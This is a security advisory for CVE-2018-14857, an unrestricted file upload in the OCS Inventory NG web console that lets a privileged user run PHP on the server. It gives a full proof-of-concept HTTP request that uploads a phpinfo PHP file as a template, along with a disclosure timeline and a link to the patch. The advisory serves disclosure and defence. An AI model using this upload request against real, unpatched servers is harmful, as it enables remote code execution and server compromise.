OCS Inventory NG Webconsole Shell Upload

OCS Inventory NG OCS Inventory Server through 2.5 allows a privileged user to gain access to the server via a template file containing PHP code, because file extensions other than .html are permitted.


MD5 | f671f8d4d1775a87dfdb4e245c86573a

# Title
Unrestricted File Upload (RCE) in OCS Inventory NG Webconsole before 2.5

#Reserved CVE
CVE-2018-14857

# Vulnerability Overview
OCS Inventory NG OCS Inventory Server through 2.5 allows a privileged user to gain access to the server via a template file containing PHP code, because file extensions other than .html are permitted.

# Discovered By
Simon Uvarov

# Vendor Status
Fixed.

# Vulnerability Details
The following request saves the phpinfo.php file to the `/usr/share/ocsinventory-reports/ocsreports/templates/` directory.

```
POST /ocsreports/index.php?function=notification HTTP/1.1
Host: 192.168.5.135
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.135/ocsreports/index.php?function=notification
Content-Type: multipart/form-data; boundary=---------------------------2093529028912
Content-Length: 970
Cookie: VERS=7015; show_all_plugins_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%225%22%3Bi%3A5%3Bs%3A1%3A%228%22%3B%7D; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; DOWNLOAD_AFFECT_RULES_col=a%3A2%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%224%22%3B%7D; PHPSESSID=0ljuolnkjcbh77ie825k3c2dc7
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------2093529028912
Content-Disposition: form-data; name="CSRF_584"

c282a92b615fcae79a060321a8285c92d759197f
-----------------------------2093529028912
Content-Disposition: form-data; name="onglet"

NOTIF_PERSO
-----------------------------2093529028912
Content-Disposition: form-data; name="old_onglet"

NOTIF_PERSO
-----------------------------2093529028912
Content-Disposition: form-data; name="notif_choice"

PERSO
-----------------------------2093529028912
Content-Disposition: form-data; name="template"; filename="phpinfo.php"
Content-Type: text/html

<?php phpinfo(); ?>

-----------------------------2093529028912
Content-Disposition: form-data; name="subject"

-----------------------------2093529028912
Content-Disposition: form-data; name="RELOAD_CONF"

-----------------------------2093529028912
Content-Disposition: form-data; name="Send"

Update
-----------------------------2093529028912--

```

The PHP file is then accessible via http://192.168.5.135/ocsreports/templates/phpinfo.php

# Timeline:
2018-08-01: vuln discovered
2018-08-01: emailed vendor
2018-08-02: reply from vendor: vuln confirmed & patch is created
2018-08-03: public disclosure

# Patch:
https://github.com/OCSInventory-NG/OCSInventory-ocsreports/commit/cc572819e373f7ff81dec61591b6f465b43c5515



Related Posts